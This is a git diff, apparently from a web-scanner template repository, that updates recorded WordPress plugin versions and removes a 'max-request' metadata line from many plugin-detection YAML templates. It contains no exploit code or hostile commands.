diff --git a/helpers/wordpress/plugins/ninja-forms.txt b/helpers/wordpress/plugins/ninja-forms.txt
index 5fbb08ca4d..813f241fc1 100644
--- a/helpers/wordpress/plugins/ninja-forms.txt
+++ b/helpers/wordpress/plugins/ninja-forms.txt
@@ -1 +1 @@
-3.6.29
\ No newline at end of file
+3.6.30
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/redux-framework.txt b/helpers/wordpress/plugins/redux-framework.txt
index b58299c38c..3401474547 100644
--- a/helpers/wordpress/plugins/redux-framework.txt
+++ b/helpers/wordpress/plugins/redux-framework.txt
@@ -1 +1 @@
-4.4.6
\ No newline at end of file
+4.4.7
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt
index 04edabda28..f430587706 100644
--- a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt
+++ b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt
@@ -1 +1 @@
-5.4.1
\ No newline at end of file
+5.4.2
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt b/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt
index a2931d315b..8df288f274 100644
--- a/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt
+++ b/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt
@@ -1 +1 @@
-7.5.0
\ No newline at end of file
+7.6.0
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt
index 306894a15e..04757a5d3c 100644
--- a/helpers/wordpress/plugins/woocommerce-payments.txt
+++ b/helpers/wordpress/plugins/woocommerce-payments.txt
@@ -1 +1 @@
-6.4.1
\ No newline at end of file
+6.4.2
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
-    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
-    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
-    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
-    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index ac77f4e5f5..f68ad2a6bf 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
-    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
-    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
-    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
-    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
-    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
-    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
-    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
-    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
-    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
-    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
-    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
-    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
-    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
-    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
-    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
-    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
-    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
-    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
-    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
-    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
-    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
-    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
-    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb..cfac0b961b 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
-    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 2249681b6d..846761f2f7 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
-    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
-    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
-    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
-    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
-    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
-    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
-    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
-    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
